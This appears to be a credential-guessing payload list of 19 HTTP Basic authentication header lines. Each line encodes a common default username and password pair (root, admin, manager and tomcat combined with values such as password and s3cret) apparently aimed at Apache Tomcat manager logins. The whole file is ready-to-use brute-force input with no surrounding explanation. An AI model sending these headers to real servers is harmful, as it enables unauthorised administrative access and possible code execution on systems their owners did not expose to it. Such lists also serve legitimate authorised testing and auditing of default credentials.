Authorization: Basic cm9vdDptYW5hZ2Vy
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Basic YWRtaW46dG9tY2F0
Authorization: Basic YWRtaW46cm9vdA==
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Authorization: Basic YWRtaW46czNjcmV0
Authorization: Basic YWRtaW46bWFuYWdlcg==
Authorization: Basic bWFuYWdlcjphZG1pbg==
Authorization: Basic bWFuYWdlcjp0b21jYXQ=
Authorization: Basic bWFuYWdlcjpyb290
Authorization: Basic bWFuYWdlcjpwYXNzd29yZA==
Authorization: Basic bWFuYWdlcjpzM2NyZXQ=
Authorization: Basic bWFuYWdlcjptYW5hZ2Vy
Authorization: Basic dG9tY2F0OmFkbWlu
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Authorization: Basic dG9tY2F0OnJvb3Q=
Authorization: Basic dG9tY2F0OnBhc3N3b3Jk
Authorization: Basic dG9tY2F0OnMzY3JldA==
Authorization: Basic dG9tY2F0Om1hbmFnZXI=